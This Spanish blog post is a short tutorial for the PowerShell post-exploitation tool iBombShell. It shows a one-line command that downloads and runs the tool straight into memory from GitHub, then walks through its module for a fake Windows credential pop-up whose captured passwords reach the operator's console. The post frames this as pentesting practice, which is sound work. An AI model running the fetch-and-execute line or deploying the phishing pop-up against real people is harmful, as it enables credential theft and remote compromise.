22 jul. 2019

Pop-Up phishing con iBombShell


iBombShell Es una herramienta escrita en PowerShell que permite a un usuario disponer de un prompt o una shell con funcionalidades de post-explotación, en cualquier instante y sistema operativo. Además, también permite ejecutar funcionalidades de explotación de vulnerabilidades en algunos casos. Estas funcionalidades son cargadas dinámicamente, en función de cuando se necesiten, a través de un repositorio de Github. La shell es descargada directamente a memoria proporcionando acceso a un gran número de características y funcionalidades de pentesting, las cuales serían descargadas directamente a memoria sobre el sistema, sin ser almacenado en disco.

Las funcionalidades descargadas directamente a memoria lo hacen en un formato de función de PowerShell. Esta vía de ejecución es conocida como EveryWhere. Además, iBombShell proporciona una segunda forma de ejecución llamada Silently. Con esta manera de ejecución se puede lanzar una instancia de iBombShell, llamada warrior. Cuando el warrior es ejecutado sobre una máquina comprometida, éste se conectará a un C2 a través de protocolo HTTP. Desde el C2, el cual está escrito en Python, se puede controlar el warrior para poder cargar funciones a memoria dinámicamente y ofrecer la ejecución remota de funcionalidades de pentesting.

El objetivo de este post es aprender a utilizar la herramienta iBombshell desde un sistema Windows y generar un Pop-up Pgishing que nos solicite las credenciales del equipo.

IBombshell puede ser de gran ayuda para realizar pruebas de Pentesting en caso de que no contemos con ninguna otra herramienta ya que solo necesitamos una consola de Powershell.

1) Desde nuestra maquina Windows, abrir una consola de Powershell:

Lo podemos hacer escribiendo “powershell” en el icono de búsqueda de nuestra barra de tareas o ejecutando la combinación de teclas “Windows + R” y escribiendo “powershell” en nuestra ventana
de ejecutar.



2) Una vez tengamos nuestra consola de Powershell en marcha, procedemos a invocar a iBombshell desde Github con el siguiente comando:

“iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console’)”



3) Para cargar nuestra herramienta, escribimos el comando “console” y aparecerá el banner de iBombshell:



Como se muestra en el enunciado, con el comando “showcommands” podremos ver los comandos y módulos disponibles en la herramienta.



4) En este laboratorio nos centraremos en el módulo “phishing/getcredential” con el cual se genera un Pop-up solicitándonos las credenciales de acceso del equipo.

Primero escribimos el comando “phishing/getcredential” para cargar el módulo y seguido a esto escribimos “showfunctions” para ver las funciones disponibles.



Por ultimo tecleamos el siguiente comando “getcredentials” y nos solicitarán una serie de parámetros para personalizar nuestro Pop-up.



Y por último aparecerá el Pop-up y una vez la victima ingrese las credenciales, nos aparecerán en la consola.





Eso fue todo por este post, espero que sea de utilidad y que sigan profundizando en el uso de esta brutal herramienta.

@XzupaX
@TheHackingDay

No hay comentarios:

Publicar un comentario

Tus Comentarios son Importantes para Nosotros Siéntete Libre De Opinar